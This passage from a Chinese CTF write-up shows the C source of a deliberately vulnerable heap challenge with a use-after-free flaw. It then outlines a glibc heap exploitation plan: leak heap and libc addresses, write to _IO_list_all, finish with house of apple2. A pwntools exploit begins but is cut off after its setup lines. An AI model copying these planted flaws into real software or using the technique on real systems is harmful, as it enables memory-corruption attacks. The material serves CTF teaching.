</span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp">#define MAX_STUDENTS 10 </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp">#define UNDERGRAD 0x1 </span></span></span><span class="line"><span class="cl"><span class="cp">#define MASTERS 0x2 </span></span></span><span class="line"><span class="cl"><span class="cp">#define PHD 0x4 </span></span></span><span class="line"><span class="cl"><span class="cp">#define POSTDOC 0x8 </span></span></span><span class="line"><span class="cl"><span class="cp">#define HASNOLIFE 0x10 </span></span></span><span class="line"><span class="cl"><span class="cp">#define ACMCYBER 0x20 </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">student_info</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">noeditingmyptrs</span><span class="p">[</span><span class="mh">0x10</span><span class="p">];</span> <span class="c1">// No editing my pointers !!! </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">attributes</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">major</span><span class="p">[</span><span class="mh">0x40</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">aux</span><span class="p">[</span><span class="mh">0x90</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">student</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">array_id</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">uid</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">student_info</span> <span class="o">*</span><span class="n">sinfo</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">student</span> <span class="o">*</span><span class="n">ourUKLA</span><span class="p">[</span><span class="n">MAX_STUDENTS</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="n">cur_index</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">menu</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;________________________________________________&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;| ---------- |&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;| ourUKLA v0.1.7 |&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;| ---------- |&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;| 1. Add student |&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;| 2. Get student info |&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;| 3. Remove student |&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;|______________________________________________|&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Option &gt; &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">init</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">setvbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">_IONBF</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">malloc</span><span class="p">(</span><span class="mh">0x18</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Administrator, welcome to ourUKLA.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;This is the portal for the University of Kungkungkung LAhur.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">fill_student_info</span><span class="p">(</span><span class="k">struct</span> <span class="n">student</span> <span class="o">*</span><span class="n">s</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">student_info</span> <span class="o">*</span><span class="n">sinfo</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">s</span><span class="o">-&gt;</span><span class="n">sinfo</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="n">sinfo</span> <span class="o">=</span> <span class="nf">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">student_info</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="n">sinfo</span> <span class="o">=</span> <span class="n">s</span><span class="o">-&gt;</span><span class="n">sinfo</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span> <span class="o">=</span> <span class="nf">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Student name: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">read</span><span class="p">(</span><span class="n">STDIN_FILENO</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="mh">0x100</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">sinfo</span><span class="o">-&gt;</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Student major: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">read</span><span class="p">(</span><span class="n">STDIN_FILENO</span><span class="p">,</span> <span class="n">sinfo</span><span class="o">-&gt;</span><span class="n">major</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Student attributes (e.g. undergrad = 1): &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%lu&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sinfo</span><span class="o">-&gt;</span><span class="n">attributes</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">((</span><span class="nf">getchar</span><span class="p">())</span> <span class="o">!=</span> <span class="sc">&#39;\n&#39;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">sinfo</span><span class="o">-&gt;</span><span class="n">attributes</span> <span class="o">|=</span> <span class="n">HASNOLIFE</span> <span class="o">|</span> <span class="n">ACMCYBER</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Require space to add aux data (y/n)? &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">res</span> <span class="o">=</span> <span class="nf">getchar</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="nf">getchar</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">res</span> <span class="o">==</span> <span class="sc">&#39;y&#39;</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Aux data: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">read</span><span class="p">(</span><span class="n">STDIN_FILENO</span><span class="p">,</span> <span class="n">sinfo</span><span class="o">-&gt;</span><span class="n">aux</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="o">-&gt;</span><span class="n">sinfo</span> <span class="o">=</span> <span class="n">sinfo</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">add_student</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kt">char</span><span class="o">*</span> <span class="n">old_top</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">char</span><span class="o">**</span><span class="p">)</span><span class="n">puts</span> <span class="o">+</span> <span class="p">(</span><span class="mh">0x166580</span><span class="o">/</span><span class="mi">8</span><span class="p">))</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">student</span> <span class="o">*</span><span class="n">s</span> <span class="o">=</span> <span class="n">ourUKLA</span><span class="p">[</span><span class="n">cur_index</span><span class="p">]</span> <span class="o">=</span> <span class="nf">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">student</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">old_top</span> <span class="o">==</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">s</span><span class="p">)</span> <span class="n">s</span><span class="o">-&gt;</span><span class="n">sinfo</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="o">-&gt;</span><span class="n">array_id</span> <span class="o">=</span> <span class="n">cur_index</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">cur_index</span> <span class="o">%=</span> <span class="n">MAX_STUDENTS</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Enter student UID: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%ld&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">s</span><span class="o">-&gt;</span><span class="n">uid</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">((</span><span class="nf">getchar</span><span class="p">())</span> <span class="o">!=</span> <span class="sc">&#39;\n&#39;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Enter student information now (y/n)? You can do it later: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">res</span> <span class="o">=</span> <span class="nf">getchar</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="nf">getchar</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">res</span> <span class="o">==</span> <span class="sc">&#39;y&#39;</span><span class="p">)</span> <span class="nf">fill_student_info</span><span class="p">(</span><span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Student with UID %lu added at index %lu!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">s</span><span class="o">-&gt;</span><span class="n">uid</span><span class="p">,</span> <span class="n">s</span><span class="o">-&gt;</span><span class="n">array_id</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">get_student_info</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">uid</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Enter student UID: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%lu&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">uid</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">MAX_STUDENTS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">ourUKLA</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="k">continue</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">ourUKLA</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">uid</span> <span class="o">==</span> <span class="n">uid</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">student_info</span> <span class="o">*</span><span class="n">sinfo</span> <span class="o">=</span> <span class="n">ourUKLA</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">sinfo</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">sinfo</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;STUDENT INFO&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Student Name: %s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">sinfo</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Student Major: %s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">sinfo</span><span class="o">-&gt;</span><span class="n">major</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Student Attributes (number): %lu</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">sinfo</span><span class="o">-&gt;</span><span class="n">attributes</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">remove_student</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">uid</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Enter student UID: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%lu&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">uid</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">MAX_STUDENTS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">ourUKLA</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="k">continue</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">ourUKLA</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">uid</span> <span class="o">==</span> <span class="n">uid</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">student_info</span> <span class="o">*</span><span class="n">sinfo</span> <span class="o">=</span> <span class="n">ourUKLA</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">sinfo</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">sinfo</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">free</span><span class="p">(</span><span class="n">sinfo</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">free</span><span class="p">(</span><span class="n">sinfo</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">free</span><span class="p">(</span><span class="n">ourUKLA</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">ourUKLA</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">init</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">choice</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">menu</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">choice</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">switch</span> <span class="p">(</span><span class="n">choice</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">1</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">add_student</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">2</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">get_student_info</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">3</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">remove_student</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">default</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;cmon you&#39;re an administrator don&#39;t tell me you don&#39;t know how to follow basic instructions!!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">};</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>菜单堆题,最多可以持有 10 个 chunk ,但可以无限申请</p> <p>有关于 student-info 的 UAF</p> <h3 id="攻击思路-2">攻击思路 </h3><p>突破口在于 student-info 的 UAF ,当申请一个新的 student 时,若 s_info 不为空,则不重新申请</p> <p>于是就可以利用这一点,在某个合适 chunk 中写入 leak 出的 _IO_list_all - 0x10 地址,然后把这个 chunk 放入 unsortedbin 中再进行若干次单采 student 使某一次恰好令 s_info = _IO_list_all - 0x10 ,如果此时选择填写 name 的话,刚好可以在 _IO_list_all 的位置上放上 name 指针,这也是一种任意地址写堆地址的原语</p> <p>然而在达成原语之前需要先 leak heap 和 leak libc ,而 leak 过程会破坏堆的结构,使后续过程难以进行;因此我们可以先 malloc 至没有 freed chunk ,再重新布局</p> <p>关于布局,核心思路就是:填满目标大小的 tcache ,从而创造出一个 unsortedbin chunk</p> <p>最后 name 上打 house of apple2 即可</p> <h3 id="exp-2">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">&#39;./chall_patched&#39;</span><span class="p">)</span> 